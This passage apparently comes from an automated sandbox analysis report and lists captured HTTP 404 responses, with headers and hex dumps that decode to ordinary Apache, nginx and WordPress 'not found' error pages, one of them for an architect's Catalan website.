69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:58:23 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 42 6f 6e 61 6e 6f 76 61 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 22 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 72 77 64 2d 74 68 65 6d 65 2f 69 6d 67 2f 69 63 6f 6e 73 2f 74 6f 75 63 68 2e 70 6e 67 22 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 66 65 65 64 2f 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 72 71 75 69 74 65 63 74 65 20 44 6f 63 74 6
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:58:26 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 42 6f 6e 61 6e 6f 76 61 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 22 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 72 77 64 2d 74 68 65 6d 65 2f 69 6d 67 2f 69 63 6f 6e 73 2f 74 6f 75 63 68 2e 70 6e 67 22 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 66 65 65 64 2f 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 72 71 75 69 74 65 63 74 65 20 44 6f 63 74 6
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:58:28 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 42 6f 6e 61 6e 6f 76 61 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 22 20 72 65 6c 3d 22 64 6e 73 2d 70 72 65 66 65 74 63 68 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 72 77 64 2d 74 68 65 6d 65 2f 69 6d 67 2f 69 63 6f 6e 73 2f 74 6f 75 63 68 2e 70 6e 67 22 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2d 70 72 65 63 6f 6d 70 6f 73 65 64 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74 2e 63 61 74 2f 66 65 65 64 2f 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 41 72 71 75 69 74 65 63 74 65 20 44 6f 63 74 6
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Sat, 11 Jan 2025 02:59:00 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:59:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:59:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 02:59:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Sat, 11 Jan 2025 02:59:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 564Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
